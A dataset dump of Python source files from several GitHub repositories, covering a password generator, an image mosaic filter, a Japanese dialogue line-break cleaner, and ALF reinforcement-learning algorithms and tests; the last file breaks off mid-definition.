metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "1ndy/password_generator",
"score": 3
} |
#### File: 1ndy/password_generator/PasswordGenerator.py
```python
import math
import random
import sys
num_passwords = 1
length = 15;
if len(sys.argv) >= 2:
num_passwords = sys.argv[1]
if len(sys.argv) >= 3:
length = sys.argv[2]
num_passwords = int(num_passwords)
length = int(length)
chars_l = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
chars_u = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']
syms = ['`','~','!','@','#','$','%','^','&','*','(',')','-','_','=','+','[',']','{','}','|',';',':','<','.','>','/','?']
nums = [0,1,2,3,4,5,6,7,8,9]
chars = [chars_l, chars_u, nums, syms]
passwords = []
final = ""
def select_random():
r = random
rr = r.randint(0,len(chars)-1)
ss = r.randint(0,len(chars[rr])-1)
return chars[rr][ss]
for x in xrange(num_passwords):
for i in xrange(length):
final = final + str(select_random())
passwords.append(final)
final = ""
for password in passwords:
print password
``` |
{
"source": "1Ne4/IDE",
"score": 3
} |
#### File: 1Ne4/IDE/old_filter.py
```python
import sys
from PIL import Image
import numpy as np
class Mosaica:
def __init__(self, imageName, mosaic_size, mosaic_gradation):
try:
self.image = Image.open(imageName)
except FileNotFoundError:
print('Ошибка: несуществующее имя')
sys.exit()
self.img_array = np.array(self.image)
self.img_height = len(self.img_array)
self.img_width = len(self.img_array[1])
self.mosaic_size = mosaic_size
self.gradation = mosaic_gradation
def mosaic(self, ):
for height in range(0, self.img_height, self.mosaic_size):
for width in range(0, self.img_width, self.mosaic_size):
avg_brightness = self.get_brightness(height, width)
self.modify_img_array(avg_brightness, height, width, self.mosaic_size, self.gradation)
res = Image.fromarray(self.img_array)
return res
def get_brightness(self, height, width):
avg_brightness = self.img_array[height: height + self.mosaic_size, width:width + self.mosaic_size].sum()
return int(avg_brightness // self.mosaic_size ** 2)
def modify_img_array(self, avg_brightness, height, width, mosaic_modifier, mosaic_step):
self.img_array[height: height + mosaic_modifier, width:width + mosaic_modifier] = int(
(avg_brightness // mosaic_step) * mosaic_step) / 3
result = Mosaica(input(),10, 50).mosaic()
result.save('res.jpg')
``` |
{
"source": "1never/open2ch-dialogue-corpus",
"score": 3
} |
#### File: 1never/open2ch-dialogue-corpus/replace_br.py
```python
import MeCab
import re
import argparse
mecab = MeCab.Tagger()
mecab.parse('')
symbols = ["w", "w", "。", "、", ",", ".", ",", ".", ")", ")", "?", "!", "?", "!", "…", "」"]
def last_word_pos(text):
node = mecab.parseToNode(text)
pos = None
while node:
if "BOS" not in node.feature:
pos = node.feature
node = node.next
return pos
def replace_br(line):
# 各文の先頭の改行記号は削除
tmp = ""
for l in line.split("\t"):
tmp += re.sub(r'^( )+(__BR__ )+', '', l) + "\t"
line = re.sub(r'\t$', "", tmp)
if "__BR__" not in line:
return line
else:
# 改行記号が3つ連続の場合は2個に置換
line = line.replace(" __BR__ __BR__ __BR__ ", " __BR__ __BR__ ")
# 改行記号が2つ連続の場合は,直前にsymbolsの記号があれば改行記号を削除.なければ句点に置換.
if " __BR__ __BR__ " in line:
tmp_line = ""
ls = line.split(" __BR__ __BR__ ")
for i in range(len(ls)-1):
l = ls[i]
contains_symbol = False
for s in symbols:
if l.endswith(s):
contains_symbol = True
if contains_symbol:
tmp_line += l
else:
tmp_line += l + "。"
tmp_line += ls[-1]
line = tmp_line
# 改行記号が存在する場合は,直前にsymbolsの記号があれば削除.
# 改行記号の直前の語が係助詞,格助詞,接続助詞の場合は読点,それ以外は句点に置換,
if " __BR__ " in line:
tmp_line = ""
ls = line.split(" __BR__ ")
for i in range(len(ls)-1):
l = ls[i]
contains_symbol = False
for s in symbols:
if l.endswith(s):
contains_symbol = True
if contains_symbol:
tmp_line += l
else:
lwpos = last_word_pos(l)
if "係助詞"in lwpos or "格助詞" in lwpos or "接続助詞" in lwpos:
tmp_line += l + "、"
else:
tmp_line += l + "。"
tmp_line += ls[-1]
line = tmp_line
return line
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--input_file", default=None, type=str, required=True,
help="The input tsv file.")
parser.add_argument("--output_file", default=None, type=str, required=True,
help="The output tsv file.")
args = parser.parse_args()
nobr_lines = []
with open(args.input_file) as f:
for l in f:
l = l.strip()
nobr_lines.append(replace_br(l) + "\n")
w = open(args.output_file, "w")
w.writelines(nobr_lines)
w.close()
if __name__ == '__main__':
main()
``` |
{
"source": "1nF0rmed/alf",
"score": 2
} |
#### File: alf/algorithms/entropy_target_algorithm_test.py
```python
from absl.testing import parameterized
import torch
import torch.nn as nn
import alf
from alf.algorithms.entropy_target_algorithm import EntropyTargetAlgorithm, EntropyTargetInfo
from alf.data_structures import TimeStep, StepType
from alf.networks import NormalProjectionNetwork, StableNormalProjectionNetwork
from alf.tensor_specs import BoundedTensorSpec, TensorSpec
class EntropyTargetAlgorithmTest(parameterized.TestCase, alf.test.TestCase):
def setUp(self):
self._input_tensor_spec = TensorSpec((10, ))
self._time_step = TimeStep(
step_type=torch.as_tensor(StepType.MID),
reward=0,
discount=1,
observation=self._input_tensor_spec.zeros(outer_dims=(1, )),
prev_action=None,
env_id=None)
self._hidden_size = 100
@parameterized.parameters((NormalProjectionNetwork, False),
(NormalProjectionNetwork, True),
(StableNormalProjectionNetwork, False),
(StableNormalProjectionNetwork, True))
def test_run_entropy_target_algorithm(self, network_ctor, scaled):
action_spec = BoundedTensorSpec((1, ), minimum=0, maximum=3)
alg = EntropyTargetAlgorithm(action_spec=action_spec)
net = network_ctor(
self._input_tensor_spec.shape[0],
action_spec,
projection_output_init_gain=1.0,
squash_mean=True,
scale_distribution=scaled)
embedding = 10 * torch.rand(
(100, ) + self._input_tensor_spec.shape, dtype=torch.float32)
dist, _ = net(embedding)
alg_step = alg.train_step(dist, self._time_step.step_type)
info = EntropyTargetInfo(loss=alg_step.info.loss)
for i in range(-3, 1):
alg._stage = torch.tensor(i, dtype=torch.int32)
alg.calc_loss(self._time_step, info)
if __name__ == "__main__":
alf.test.main()
```
#### File: alf/algorithms/hypernetwork_algorithm.py
```python
from absl import logging
import functools
import gin
import numpy as np
import torch
import torch.nn.functional as F
from typing import Callable
import alf
from alf.algorithms.algorithm import Algorithm
from alf.algorithms.config import TrainerConfig
from alf.data_structures import AlgStep, LossInfo, namedtuple
from alf.algorithms.generator import Generator
from alf.algorithms.hypernetwork_networks import ParamNetwork
from alf.networks import EncodingNetwork
from alf.tensor_specs import TensorSpec
from alf.utils import common, math_ops, summary_utils
from alf.utils.summary_utils import record_time
HyperNetworkLossInfo = namedtuple("HyperNetworkLossInfo", ["loss", "extra"])
def classification_loss(output, target):
pred = output.max(-1)[1]
acc = pred.eq(target).float().mean(0)
avg_acc = acc.mean()
loss = F.cross_entropy(output.transpose(1, 2), target)
return HyperNetworkLossInfo(loss=loss, extra=avg_acc)
def regression_loss(output, target):
out_shape = output.shape[-1]
assert (target.shape[-1] == out_shape), (
"feature dimension of output and target does not match.")
loss = 0.5 * F.mse_loss(
output.reshape(-1, out_shape),
target.reshape(-1, out_shape),
reduction='sum')
return HyperNetworkLossInfo(loss=loss, extra=())
@gin.configurable
class HyperNetwork(Algorithm):
"""HyperNetwork
HyperNetwork algorithm maintains a generator that generates a set of
parameters for a predefined neural network from a random noise input.
It is based on the following work:
https://github.com/neale/HyperGAN
Ratzlaff and Fuxin. "HyperGAN: A Generative Model for Diverse,
Performant Neural Networks." International Conference on Machine Learning. 2019.
Major differences versus the original paper are:
* A single generator that generates parameters for all network layers.
* Remove the mixer and the discriminator.
* The generator is trained with Amortized particle-based variational
inference (ParVI) methods, please refer to generator.py for details.
"""
def __init__(self,
input_tensor_spec,
conv_layer_params=None,
fc_layer_params=None,
activation=torch.relu_,
last_layer_param=None,
last_activation=None,
noise_dim=32,
hidden_layers=(64, 64),
use_fc_bn=False,
num_particles=10,
entropy_regularization=1.,
loss_type="classification",
voting="soft",
par_vi="svgd",
optimizer=None,
logging_network=False,
logging_training=False,
logging_evaluate=False,
config: TrainerConfig = None,
name="HyperNetwork"):
"""
Args:
Args for the generated parametric network
====================================================================
input_tensor_spec (nested TensorSpec): the (nested) tensor spec of
the input. If nested, then ``preprocessing_combiner`` must not be
None.
conv_layer_params (tuple[tuple]): a tuple of tuples where each
tuple takes a format
``(filters, kernel_size, strides, padding, pooling_kernel)``,
where ``padding`` and ``pooling_kernel`` are optional.
fc_layer_params (tuple[tuple]): a tuple of tuples where each tuple
takes a format ``(FC layer sizes. use_bias)``, where
``use_bias`` is optional.
activation (nn.functional): activation used for all the layers but
the last layer.
last_layer_param (tuple): an optional tuple of the format
``(size, use_bias)``, where ``use_bias`` is optional,
it appends an additional layer at the very end.
Note that if ``last_activation`` is specified,
``last_layer_param`` has to be specified explicitly.
last_activation (nn.functional): activation function of the
additional layer specified by ``last_layer_param``. Note that if
``last_layer_param`` is not None, ``last_activation`` has to be
specified explicitly.
Args for the generator
====================================================================
noise_dim (int): dimension of noise
hidden_layers (tuple): size of hidden layers.
use_fc_bn (bool): whether use batnch normalization for fc layers.
num_particles (int): number of sampling particles
entropy_regularization (float): weight of entropy regularization
Args for training and testing
====================================================================
loss_type (str): loglikelihood type for the generated functions,
types are [``classification``, ``regression``]
voting (str): types of voting results from sampled functions,
types are [``soft``, ``hard``]
par_vi (str): types of particle-based methods for variational inference,
types are [``svgd``, ``svgd2``, ``svgd3``, ``gfsf``]
optimizer (torch.optim.Optimizer): The optimizer for training.
logging_network (bool): whether logging the archetectures of networks.
logging_training (bool): whether logging loss and acc during training.
logging_evaluate (bool): whether logging loss and acc of evaluate.
config (TrainerConfig): configuration for training
name (str):
"""
super().__init__(train_state_spec=(), optimizer=optimizer, name=name)
param_net = ParamNetwork(
input_tensor_spec=input_tensor_spec,
conv_layer_params=conv_layer_params,
fc_layer_params=fc_layer_params,
activation=activation,
last_layer_param=last_layer_param,
last_activation=last_activation)
gen_output_dim = param_net.param_length
noise_spec = TensorSpec(shape=(noise_dim, ))
net = EncodingNetwork(
noise_spec,
fc_layer_params=hidden_layers,
use_fc_bn=use_fc_bn,
last_layer_size=gen_output_dim,
last_activation=math_ops.identity,
name="Generator")
if logging_network:
logging.info("Generated network")
logging.info("-" * 68)
logging.info(param_net)
logging.info("Generator network")
logging.info("-" * 68)
logging.info(net)
if par_vi == 'svgd':
par_vi = 'svgd3'
self._generator = Generator(
gen_output_dim,
noise_dim=noise_dim,
net=net,
entropy_regularization=entropy_regularization,
par_vi=par_vi,
optimizer=None,
name=name)
self._param_net = param_net
self._num_particles = num_particles
self._entropy_regularization = entropy_regularization
self._train_loader = None
self._test_loader = None
self._use_fc_bn = use_fc_bn
self._loss_type = loss_type
self._logging_training = logging_training
self._logging_evaluate = logging_evaluate
self._config = config
assert (voting in ['soft',
'hard']), ('voting only supports "soft" and "hard"')
self._voting = voting
if loss_type == 'classification':
self._loss_func = classification_loss
self._vote = self._classification_vote
elif loss_type == 'regression':
self._loss_func = regression_loss
self._vote = self._regression_vote
else:
raise ValueError("Unsupported loss_type: %s" % loss_type)
def set_data_loader(self, train_loader, test_loader=None):
"""Set data loadder for training and testing.
Args:
train_loader (torch.utils.data.DataLoader): training data loader
test_loader (torch.utils.data.DataLoader): testing data loader
"""
self._train_loader = train_loader
self._test_loader = test_loader
self._entropy_regularization = 1 / len(train_loader)
def set_num_particles(self, num_particles):
"""Set the number of particles to sample through one forward
pass of the hypernetwork. """
self._num_particles = num_particles
@property
def num_particles(self):
"""number of sampled particles. """
return self._num_particles
def sample_parameters(self, noise=None, num_particles=None, training=True):
"""Sample parameters for an ensemble of networks.
Args:
noise (Tensor): input noise to self._generator. Default is None.
num_particles (int): number of sampled particles. Default is None.
If both noise and num_particles are None, num_particles
provided to the constructor will be used as batch_size for
self._generator.
training (bool): whether or not training self._generator
Returns:
AlgStep.output from predict_step of self._generator
"""
if noise is None and num_particles is None:
num_particles = self.num_particles
generator_step = self._generator.predict_step(
noise=noise, batch_size=num_particles, training=training)
return generator_step.output
def predict_step(self, inputs, params=None, num_particles=None,
state=None):
"""Predict ensemble outputs for inputs using the hypernetwork model.
Args:
inputs (Tensor): inputs to the ensemble of networks.
params (Tensor): parameters of the ensemble of networks,
if None, will resample.
num_particles (int): size of sampled ensemble. Default is None.
state: not used.
Returns:
AlgStep: outputs with shape (batch_size, self._param_net._output_spec.shape[0])
"""
if params is None:
params = self.sample_parameters(num_particles=num_particles)
self._param_net.set_parameters(params)
outputs, _ = self._param_net(inputs)
return AlgStep(output=outputs, state=(), info=())
def train_iter(self, num_particles=None, state=None):
"""Perform one epoch (iteration) of training.
Args:
num_particles (int): number of sampled particles. Default is None.
state: not used
Return:
mini_batch number
"""
assert self._train_loader is not None, "Must set data_loader first."
alf.summary.increment_global_counter()
with record_time("time/train"):
loss = 0.
if self._loss_type == 'classification':
avg_acc = []
for batch_idx, (data, target) in enumerate(self._train_loader):
data = data.to(alf.get_default_device())
target = target.to(alf.get_default_device())
alg_step = self.train_step((data, target),
num_particles=num_particles,
state=state)
loss_info, params = self.update_with_gradient(alg_step.info)
loss += loss_info.extra.generator.loss
if self._loss_type == 'classification':
avg_acc.append(alg_step.info.extra.generator.extra)
acc = None
if self._loss_type == 'classification':
acc = torch.as_tensor(avg_acc).mean() * 100
if self._logging_training:
if self._loss_type == 'classification':
logging.info("Avg acc: {}".format(acc))
logging.info("Cum loss: {}".format(loss))
self.summarize_train(loss_info, params, cum_loss=loss, avg_acc=acc)
return batch_idx + 1
def train_step(self,
inputs,
num_particles=None,
entropy_regularization=None,
state=None):
"""Perform one batch of training computation.
Args:
inputs (nested Tensor): input training data.
num_particles (int): number of sampled particles. Default is None,
in which case self._num_particles will be used for batch_size
of self._generator.
state: not used
Returns:
AlgStep:
outputs: Tensor with shape (batch_size, dim)
info: LossInfo
"""
if num_particles is None:
num_particles = self._num_particles
if entropy_regularization is None:
entropy_regularization = self._entropy_regularization
return self._generator.train_step(
inputs=None,
loss_func=functools.partial(self._neglogprob, inputs),
batch_size=num_particles,
entropy_regularization=entropy_regularization,
state=())
def evaluate(self, num_particles=None):
"""Evaluate on a randomly drawn ensemble.
Args:
num_particles (int): number of sampled particles. Default is None.
"""
assert self._test_loader is not None, "Must set test_loader first."
logging.info("==> Begin testing")
if self._use_fc_bn:
self._generator.eval()
params = self.sample_parameters(num_particles=num_particles)
self._param_net.set_parameters(params)
if self._use_fc_bn:
self._generator.train()
with record_time("time/test"):
if self._loss_type == 'classification':
test_acc = 0.
test_loss = 0.
for i, (data, target) in enumerate(self._test_loader):
data = data.to(alf.get_default_device())
target = target.to(alf.get_default_device())
output, _ = self._param_net(data) # [B, N, D]
loss, extra = self._vote(output, target)
if self._loss_type == 'classification':
test_acc += extra.item()
test_loss += loss.loss.item()
if self._loss_type == 'classification':
test_acc /= len(self._test_loader.dataset)
alf.summary.scalar(name='eval/test_acc', data=test_acc * 100)
if self._logging_evaluate:
if self._loss_type == 'classification':
logging.info("Test acc: {}".format(test_acc * 100))
logging.info("Test loss: {}".format(test_loss))
alf.summary.scalar(name='eval/test_loss', data=test_loss)
def _neglogprob(self, inputs, params):
self._param_net.set_parameters(params)
num_particles = params.shape[0]
data, target = inputs
output, _ = self._param_net(data) # [B, N, D]
target = target.unsqueeze(1).expand(*target.shape[:1], num_particles,
*target.shape[1:])
return self._loss_func(output, target)
def _classification_vote(self, output, target):
"""ensmeble the ooutputs from sampled classifiers."""
num_particles = output.shape[1]
probs = F.softmax(output, dim=-1) # [B, N, D]
if self._voting == 'soft':
pred = probs.mean(1).cpu() # [B, D]
vote = pred.argmax(-1)
elif self._voting == 'hard':
pred = probs.argmax(-1).cpu() # [B, N, 1]
vote = []
for i in range(pred.shape[0]):
values, counts = torch.unique(
pred[i], sorted=False, return_counts=True)
modes = (counts == counts.max()).nonzero()
label = values[torch.randint(len(modes), (1, ))]
vote.append(label)
vote = torch.as_tensor(vote, device='cpu')
correct = vote.eq(target.cpu().view_as(vote)).float().cpu().sum()
target = target.unsqueeze(1).expand(*target.shape[:1], num_particles,
*target.shape[1:])
loss = classification_loss(output, target)
return loss, correct
def _regression_vote(self, output, target):
"""ensemble the outputs for sampled regressors."""
num_particles = output.shape[1]
pred = output.mean(1) # [B, D]
loss = regression_loss(pred, target)
target = target.unsqueeze(1).expand(*target.shape[:1], num_particles,
*target.shape[1:])
total_loss = regression_loss(output, target)
return loss, total_loss
def summarize_train(self, loss_info, params, cum_loss=None, avg_acc=None):
"""Generate summaries for training & loss info after each gradient update.
The default implementation of this function only summarizes params
(with grads) and the loss. An algorithm can override this for additional
summaries. See ``RLAlgorithm.summarize_train()`` for an example.
Args:
experience (nested Tensor): samples used for the most recent
``update_with_gradient()``. By default it's not summarized.
train_info (nested Tensor): ``AlgStep.info`` returned by either
``rollout_step()`` (on-policy training) or ``train_step()``
(off-policy training). By default it's not summarized.
loss_info (LossInfo): loss
params (list[Parameter]): list of parameters with gradients
"""
if self._config.summarize_grads_and_vars:
summary_utils.summarize_variables(params)
summary_utils.summarize_gradients(params)
if self._config.debug_summaries:
summary_utils.summarize_loss(loss_info)
if cum_loss is not None:
alf.summary.scalar(name='train_epoch/neglogprob', data=cum_loss)
if avg_acc is not None:
alf.summary.scalar(name='train_epoch/avg_acc', data=avg_acc)
```
#### File: alf/algorithms/rl_algorithm_test.py
```python
import tempfile
import torch
import torch.distributions as td
import unittest
import alf
from alf.utils import common, dist_utils, tensor_utils
from alf.data_structures import AlgStep, Experience, LossInfo, StepType, TimeStep
from alf.algorithms.on_policy_algorithm import OnPolicyAlgorithm
from alf.algorithms.config import TrainerConfig
class MyAlg(OnPolicyAlgorithm):
def __init__(self,
observation_spec,
action_spec,
env=None,
config=None,
on_policy=True,
debug_summaries=False):
self._on_policy = on_policy
super().__init__(
observation_spec=observation_spec,
action_spec=action_spec,
train_state_spec=observation_spec,
env=env,
config=config,
optimizer=alf.optimizers.Adam(lr=1e-1),
debug_summaries=debug_summaries,
name="MyAlg")
self._proj_net = alf.networks.CategoricalProjectionNetwork(
input_size=2, action_spec=action_spec)
def is_on_policy(self):
return self._on_policy
def predict_step(self, time_step: TimeStep, state, epsilon_greedy):
dist, _ = self._proj_net(time_step.observation)
return AlgStep(output=dist.sample(), state=(), info=())
def rollout_step(self, time_step: TimeStep, state):
dist, _ = self._proj_net(time_step.observation)
return AlgStep(
output=dist.sample(), state=time_step.observation, info=dist)
def train_step(self, exp: Experience, state):
dist, _ = self._proj_net(exp.observation)
return AlgStep(output=dist.sample(), state=exp.observation, info=dist)
def calc_loss(self, experience, train_info: td.Distribution):
dist: td.Distribution = train_info
log_prob = dist.log_prob(experience.action)
loss = -log_prob[:-1] * experience.reward[1:]
loss = tensor_utils.tensor_extend_zero(loss)
return LossInfo(loss=loss)
#TODO: move this to environments.suite_unittest
class MyEnv(object):
"""A simple environment for unittesting algorithms.
At each step, each episode ends with probability 0.2 (independently among
the batch). Reward depends only on the action. Action 0 gets reward 0.5,
action 1 gets 1.0, action 2 gets reward -1.
"""
def __init__(self, batch_size, obs_shape=(2, )):
super().__init__()
self._batch_size = batch_size
self._rewards = torch.tensor([0.5, 1.0, -1.])
self._observation_spec = alf.TensorSpec(obs_shape, dtype='float32')
self._action_spec = alf.BoundedTensorSpec(
shape=(), dtype='int64', minimum=0, maximum=2)
self.reset()
def observation_spec(self):
return self._observation_spec
def action_spec(self):
return self._action_spec
def reward_spec(self):
return alf.TensorSpec(())
def reset(self):
self._prev_action = torch.zeros(self._batch_size, dtype=torch.int64)
self._current_time_step = TimeStep(
observation=self._observation_spec.randn([self._batch_size]),
step_type=torch.full([self._batch_size],
StepType.FIRST,
dtype=torch.int32),
reward=torch.zeros(self._batch_size),
discount=torch.zeros(self._batch_size),
prev_action=self._prev_action,
env_id=torch.arange(self._batch_size, dtype=torch.int32))
return self._current_time_step
def close(self):
pass
@property
def batch_size(self):
return self._batch_size
def step(self, action):
prev_step_type = self._current_time_step.step_type
is_first = prev_step_type == StepType.FIRST
is_mid = prev_step_type == StepType.MID
is_last = prev_step_type == StepType.LAST
step_type = torch.where(
is_mid & (torch.rand(self._batch_size) < 0.2),
torch.full([self._batch_size], StepType.LAST, dtype=torch.int32),
torch.full([self._batch_size], StepType.MID, dtype=torch.int32))
step_type = torch.where(
is_last,
torch.full([self._batch_size], StepType.FIRST, dtype=torch.int32),
step_type)
step_type = torch.where(
is_first,
torch.full([self._batch_size], StepType.MID, dtype=torch.int32),
step_type)
self._current_time_step = TimeStep(
observation=self._observation_spec.randn([self._batch_size]),
step_type=step_type,
reward=self._rewards[action],
discount=torch.zeros(self._batch_size),
prev_action=self._prev_action,
env_id=torch.arange(self._batch_size, dtype=torch.int32))
self._prev_action = action
return self._current_time_step
def current_time_step(self):
return self._current_time_step
class RLAlgorithmTest(unittest.TestCase):
def test_on_policy_algorithm(self):
# root_dir is not used. We have to give it a value because
# it is a required argument of TrainerConfig.
config = TrainerConfig(
root_dir='/tmp/rl_algorithm_test', unroll_length=5, num_envs=1)
env = MyEnv(batch_size=3)
alg = MyAlg(
observation_spec=env.observation_spec(),
action_spec=env.action_spec(),
env=env,
config=config,
on_policy=True,
debug_summaries=True)
for _ in range(100):
alg.train_iter()
time_step = common.get_initial_time_step(env)
state = alg.get_initial_predict_state(env.batch_size)
policy_step = alg.rollout_step(time_step, state)
logits = policy_step.info.log_prob(torch.arange(3).reshape(3, 1))
print("logits: ", logits)
self.assertTrue(torch.all(logits[1, :] > logits[0, :]))
self.assertTrue(torch.all(logits[1, :] > logits[2, :]))
def test_off_policy_algorithm(self):
with tempfile.TemporaryDirectory() as root_dir:
common.run_under_record_context(
lambda: self._test_off_policy_algorithm(root_dir),
summary_dir=root_dir,
summary_interval=1,
flush_secs=1)
def _test_off_policy_algorithm(self, root_dir):
alf.summary.enable_summary()
config = TrainerConfig(
root_dir=root_dir,
unroll_length=5,
num_envs=1,
num_updates_per_train_iter=1,
mini_batch_length=5,
mini_batch_size=3,
use_rollout_state=True,
summarize_grads_and_vars=True,
summarize_action_distributions=True,
whole_replay_buffer_training=True)
env = MyEnv(batch_size=3)
alg = MyAlg(
observation_spec=env.observation_spec(),
action_spec=env.action_spec(),
env=env,
on_policy=False,
config=config)
for _ in range(100):
alg.train_iter()
time_step = common.get_initial_time_step(env)
state = alg.get_initial_predict_state(env.batch_size)
policy_step = alg.rollout_step(time_step, state)
logits = policy_step.info.log_prob(torch.arange(3).reshape(3, 1))
print("logits: ", logits)
self.assertTrue(torch.all(logits[1, :] > logits[0, :]))
self.assertTrue(torch.all(logits[1, :] > logits[2, :]))
if __name__ == '__main__':
unittest.main()
```
#### File: alf/environments/alf_wrappers_test.py
```python
from absl.testing import parameterized
from absl.testing.absltest import mock
import gym
import math
import torch
import numpy as np
import alf
import alf.data_structures as ds
from alf.environments import alf_environment, alf_gym_wrapper, alf_wrappers
from alf.environments.random_alf_environment import RandomAlfEnvironment
import alf.tensor_specs as ts
class AlfEnvironmentBaseWrapperTest(parameterized.TestCase):
@parameterized.named_parameters(
{
'testcase_name': 'scalar',
'batch_size': None
},
{
'testcase_name': 'batched',
'batch_size': 2
},
)
def test_batch_properties(self, batch_size):
obs_spec = ts.BoundedTensorSpec((2, 3), torch.int32, -10, 10)
action_spec = ts.BoundedTensorSpec((1, ), torch.int64, -10, 10)
env = RandomAlfEnvironment(
obs_spec,
action_spec,
reward_fn=lambda *_: torch.tensor([1.0], dtype=torch.float32),
batch_size=batch_size)
wrap_env = alf_wrappers.AlfEnvironmentBaseWrapper(env)
self.assertEqual(wrap_env.batched, env.batched)
self.assertEqual(wrap_env.batch_size, env.batch_size)
def test_default_batch_properties(self):
cartpole_env = gym.spec('CartPole-v1').make()
env = alf_gym_wrapper.AlfGymWrapper(cartpole_env)
self.assertFalse(env.batched)
self.assertEqual(env.batch_size, 1)
wrap_env = alf_wrappers.AlfEnvironmentBaseWrapper(env)
self.assertEqual(wrap_env.batched, env.batched)
self.assertEqual(wrap_env.batch_size, env.batch_size)
def test_wrapped_method_propagation(self):
mock_env = mock.MagicMock()
env = alf_wrappers.AlfEnvironmentBaseWrapper(mock_env)
env.reset()
self.assertEqual(1, mock_env.reset.call_count)
action = np.array(0, dtype=np.int64)
env.step(action)
self.assertEqual(1, mock_env.step.call_count)
mock_env.step.assert_called_with(0)
env.seed(0)
self.assertEqual(1, mock_env.seed.call_count)
mock_env.seed.assert_called_with(0)
env.render()
self.assertEqual(1, mock_env.render.call_count)
env.close()
self.assertEqual(1, mock_env.close.call_count)
class TimeLimitWrapperTest(alf.test.TestCase):
def test_limit_duration_wrapped_env_forwards_calls(self):
cartpole_env = gym.spec('CartPole-v1').make()
env = alf_gym_wrapper.AlfGymWrapper(cartpole_env)
env = alf_wrappers.TimeLimit(env, 10)
action_spec = env.action_spec()
self.assertEqual((), action_spec.shape)
self.assertEqual(0, action_spec.minimum)
self.assertEqual(1, action_spec.maximum)
observation_spec = env.observation_spec()
self.assertEqual((4, ), observation_spec.shape)
high = np.array([
4.8,
np.finfo(np.float32).max, 2 / 15.0 * math.pi,
np.finfo(np.float32).max
])
np.testing.assert_array_almost_equal(-high, observation_spec.minimum)
np.testing.assert_array_almost_equal(high, observation_spec.maximum)
def test_limit_duration_stops_after_duration(self):
cartpole_env = gym.make('CartPole-v1')
env = alf_gym_wrapper.AlfGymWrapper(cartpole_env)
env = alf_wrappers.TimeLimit(env, 2)
env.reset()
action = np.array(0, dtype=np.int64)
env.step(action)
time_step = env.step(action)
self.assertTrue(time_step.is_last())
self.assertNotEqual(None, time_step.discount)
self.assertNotEqual(0.0, time_step.discount)
def test_extra_env_methods_work(self):
cartpole_env = gym.make('CartPole-v1')
env = alf_gym_wrapper.AlfGymWrapper(cartpole_env)
env = alf_wrappers.TimeLimit(env, 2)
self.assertEqual(None, env.get_info())
env.reset()
action = np.array(0, dtype=np.int64)
env.step(action)
self.assertEqual({}, env.get_info())
def test_automatic_reset(self):
cartpole_env = gym.make('CartPole-v1')
env = alf_gym_wrapper.AlfGymWrapper(cartpole_env)
env = alf_wrappers.TimeLimit(env, 2)
# Episode 1
action = np.array(0, dtype=np.int64)
first_time_step = env.step(action)
self.assertTrue(first_time_step.is_first())
mid_time_step = env.step(action)
self.assertTrue(mid_time_step.is_mid())
last_time_step = env.step(action)
self.assertTrue(last_time_step.is_last())
# Episode 2
first_time_step = env.step(action)
self.assertTrue(first_time_step.is_first())
mid_time_step = env.step(action)
self.assertTrue(mid_time_step.is_mid())
last_time_step = env.step(action)
self.assertTrue(last_time_step.is_last())
def test_duration_applied_after_episode_terminates_early(self):
cartpole_env = gym.make('CartPole-v1')
env = alf_gym_wrapper.AlfGymWrapper(cartpole_env)
env = alf_wrappers.TimeLimit(env, 10000)
# Episode 1 stepped until termination occurs.
action = np.array(1, dtype=np.int64)
time_step = env.step(action)
while not time_step.is_last():
time_step = env.step(action)
self.assertTrue(time_step.is_last())
env._duration = 2
# Episode 2 short duration hits step limit.
action = np.array(0, dtype=np.int64)
first_time_step = env.step(action)
self.assertTrue(first_time_step.is_first())
mid_time_step = env.step(action)
self.assertTrue(mid_time_step.is_mid())
last_time_step = env.step(action)
self.assertTrue(last_time_step.is_last())
if __name__ == '__main__':
alf.test.main()
```
#### File: alf/networks/value_networks.py
```python
import gin
import functools
import torch
import torch.nn as nn
from .encoding_networks import EncodingNetwork, LSTMEncodingNetwork
from .preprocessor_networks import PreprocessorNetwork
from alf.tensor_specs import TensorSpec
import alf.utils.math_ops as math_ops
@gin.configurable
class ValueNetwork(PreprocessorNetwork):
"""Output temporally uncorrelated values."""
def __init__(self,
input_tensor_spec,
output_tensor_spec=TensorSpec(()),
input_preprocessors=None,
preprocessing_combiner=None,
conv_layer_params=None,
fc_layer_params=None,
activation=torch.relu_,
kernel_initializer=None,
use_fc_bn=False,
name="ValueNetwork"):
"""Creates a value network that estimates the expected return.
Args:
input_tensor_spec (TensorSpec): the tensor spec of the input
output_tensor_spec (TensorSpec): spec for the output
input_preprocessors (nested InputPreprocessor): a nest of
`InputPreprocessor`, each of which will be applied to the
corresponding input. If not None, then it must
have the same structure with `input_tensor_spec` (after reshaping).
If any element is None, then it will be treated as math_ops.identity.
This arg is helpful if you want to have separate preprocessings
for different inputs by configuring a gin file without changing
the code. For example, embedding a discrete input before concatenating
it to another continuous vector.
preprocessing_combiner (NestCombiner): preprocessing called on
complex inputs. Note that this combiner must also accept
`input_tensor_spec` as the input to compute the processed
tensor spec. For example, see `alf.nest.utils.NestConcat`. This
arg is helpful if you want to combine inputs by configuring a
gin file without changing the code.
conv_layer_params (tuple[tuple]): a tuple of tuples where each
tuple takes a format `(filters, kernel_size, strides, padding)`,
where `padding` is optional.
fc_layer_params (tuple[int]): a tuple of integers representing hidden
FC layer sizes.
activation (nn.functional): activation used for hidden layers. The
last layer will not be activated.
kernel_initializer (Callable): initializer for all the layers but
the last layer. If none is provided a default xavier_uniform
initializer will be used.
use_fc_bn (bool): whether use Batch Normalization for the internal
FC layers (i.e. FC layers beside the last one).
name (str):
"""
super().__init__(
input_tensor_spec,
input_preprocessors,
preprocessing_combiner,
name=name)
if kernel_initializer is None:
kernel_initializer = torch.nn.init.xavier_uniform_
last_kernel_initializer = functools.partial(
torch.nn.init.uniform_, a=-0.03, b=0.03)
self._encoding_net = EncodingNetwork(
input_tensor_spec=self._processed_input_tensor_spec,
conv_layer_params=conv_layer_params,
fc_layer_params=fc_layer_params,
activation=activation,
kernel_initializer=kernel_initializer,
use_fc_bn=use_fc_bn,
last_layer_size=output_tensor_spec.numel,
last_activation=math_ops.identity,
last_kernel_initializer=last_kernel_initializer)
self._output_spec = output_tensor_spec
def forward(self, observation, state=()):
